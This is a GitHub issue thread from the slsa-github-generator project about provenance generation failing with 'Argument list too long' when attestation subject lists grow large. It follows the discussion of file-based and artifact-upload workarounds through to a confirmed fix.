slsa-github-generator [bug] Alternative ways required to pass large attestation subjects

Describe the bug For complex projects that include multiple modules or packages, the number of subjects and size of base64-subjects can easily grow larger than the allowed size of command-line argument and environment strings. For example the size of the subject hashes in a project I tried recently is about 200KB which results in the following error when the generator tries to pass it as command-line argument.

 Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too long

To get around that, possible solutions require making changes to the GH runner, which is not a good idea probably.

Would it be possible to pass the subjects in a different way and not as an environment string through command-line argument as done here?

Additional context

The documentation of kernel call execve() in section Limits on size of arguments and environment is helpful.
Here is another related question on Stack Vverflow.

Sep 11 '22 05:09 behnazh-w

Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.

Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?

Sep 12 '22 01:09 ianlewis

Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.

The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.

Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?

It was just the number of subjects. There were several metadata files and docs for each artifact.

Sep 12 '22 03:09 behnazh-w

Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.

The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.

Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate so you can't just pass a path to read or something. You could however upload a file containing the subjects and hashes to a the workflow run using actions/upload-artifact and the reusable workflow could download it.

This would complicate the use of the workflow a bit because users would need to call actions/upload-artifact first to upload the file but it might be unavoidable for large subject lists.

Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?

It was just the number of subjects. There were several metadata files and docs for each artifact.

So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?

If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.

Sep 12 '22 05:09 ianlewis

Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.

The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.

Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate so you can't just pass a path to read or something. You could however upload a file containing the subjects and hashes to a the workflow run using actions/upload-artifact and the reusable workflow could download it.

This would complicate the use of the workflow a bit because users would need to call actions/upload-artifact first to upload the file but it might be unavoidable for large subject lists.

I'm still thinking to keep the workflow as it is, i.e., users would provide the inputs.base64-subjects as the output of the build job. The idea would be to store the input in a file instead of an env variable in the generator workflow itself to avoid passing it as an argument string. Of course that would be limited to the maximum size of a GH job output, but in my case that was not an issue.

Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?

It was just the number of subjects. There were several metadata files and docs for each artifact.

So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?

If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.

All the files including the docs are created in one single build step in my usecase. Example metadata files are the md5, sha256, sha512 of the artifacts, pom files, SBOM, etc.

Sep 12 '22 09:09 behnazh-w

@behnazh-w I suppose there's no way for you to split the builds into smaller ones?

One idea, like it's been suggested, is to use a new file option and have it users upload it:

subjects-filename: "./path/to/file"
base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"

Most users would keep the current option, and only users who hit the size limits would use the second option. Wdut?

Sep 12 '22 14:09 laurentsimon

@behnazh-w I suppose there's no way for you to split the builds into smaller ones?

No, I can't split the build.

One idea, like it's been suggested, is to use a new file option and have it users upload it:
subjects-filename: "./path/to/file"
base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"
Most users would keep the current option, and only users who hit the size limits would use the second option. Wdut?

Initially I was thinking to keep the current option as it is and pass the subjects to the builder binary in a file by reading it from the build job output like this:

echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"

But after thinking some more, passing such a large value as a job output is not a good idea in general and might slow down the GHA runs. So using a new file option as suggested sounds good to me.

Sep 15 '22 11:09 behnazh-w

 Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too long
Additional context

The documentation of kernel call execve() in section Limits on size of arguments and environment is helpful.

Here is another related question on Stack Vverflow.

I see. We are getting this error currently not because of GitHub complaining about the size of the input, but because the argument is too long on the command line. If that's the case we could write the input to a temporary file and pass the file to the generator binary without changing the workflow inputs and callers of the workflow would be unchanged.

Though there would be a problem with escaping the input as we can't use environment variables due to the length. We would need to figure out a way to prevent script injection without using environment variables.

Oct 10 '22 23:10 ianlewis

@ianlewis @laurentsimon We are hitting this problem in production now: https://github.com/micronaut-projects/micronaut-oracle-cloud/actions/runs/5017226257/jobs/8996007716#step:3:255

As a quick fix, is it possible to store the input in a file instead of an env variable in the generator workflow to avoid passing it as an argument string?

echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"

May 19 '23 08:05 behnazh-w

Yes I think that should be do-able. I think we has discussed this a while ago. @ianlewis not side effects I'm missing, right?

May 19 '23 20:05 laurentsimon

I think we need to implement https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1243865527. For the sha256 of the file content, we either let users call sha256sum themselves, or we make a public version of the secure-upload Action https://github.com/slsa-framework/slsa-github-generator/tree/main/.github/actions/secure-upload-artifact

We also need to take of the fact that the filename should be the basename(path), I think

We can't save the input into a file because to do so, we need to echo <value> but the value is too large. It may also be failing at the time we're setting the env variable.

Limits: https://www.in-ulm.de/~mascheck/various/argmax/

May 19 '23 20:05 laurentsimon

Right. The problem is occurring here when GHA invokes bash to run the script and not when the script is executing the builder binary itself.

An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/micronaut-oracle-cloud/micronaut-oracle-cloud'. Argument list too long

If it's an input, we can't really avoid putting it in an environment variable because of https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1273900126

It's a bit message from a usability standpoint but I think the upload/download solution is the currently the only known solution that would work.

May 21 '23 22:05 ianlewis

We can't save the input into a file because to do so, we need to echo but the value is too large. It may also be failing at the time we're setting the env variable.

That's true considering the limit size for bash command arguments. Although in the same workflow the same value is passed to echo for debugging purposes, but it didn't cause an issue. Just if you're curious, I have left this line to see if GitHub keeps masking the output due to secrets being present in the step, but that's a separate issue.

I think the upload/download solution is the currently the only known solution that would work.

It sounds good.

May 22 '23 03:05 behnazh-w

Is there a timeline for adding secure upload/download to fix this issue?

May 24 '23 23:05 behnazh-w

I think we can aim for first half of July. Would it be OK on your side? If you need ti earlier, I could give you some hints. Let me know.

May 26 '23 20:05 laurentsimon

I think we can aim for first half of July. Would it be OK on your side? If you need ti earlier, I could give you some hints. Let me know.

Yes, that would work. As a temporary fix I have removed .module, -sources.jar and -javadoc.jar artifacts, but would definitely like to add them back when this is fixed. Thanks!

May 29 '23 04:05 behnazh-w

Re-opening until we have e2e tests for this.

@behnazh-w can you verify that https://github.com/slsa-framework/slsa-github-generator/pull/2365 fixes the issue? You need to reference the builder at main to test. How many subjects caused the problem in your experience?

Jul 19 '23 15:07 laurentsimon

@laurentsimon Please also add a note about this feature to the CHANGELOG

Jul 19 '23 23:07 ianlewis

Thanks for the new feature. I tested the builder at main against 1851 subjects and it works. The original failing pipeline was generating 703 subjects.

Jul 20 '23 04:07 behnazh-w

Thanks for the info. I'll create the e2e tests with 2k subjects then.

Jul 20 '23 04:07 laurentsimon

Closing this issue then

Jul 20 '23 22:07 laurentsimon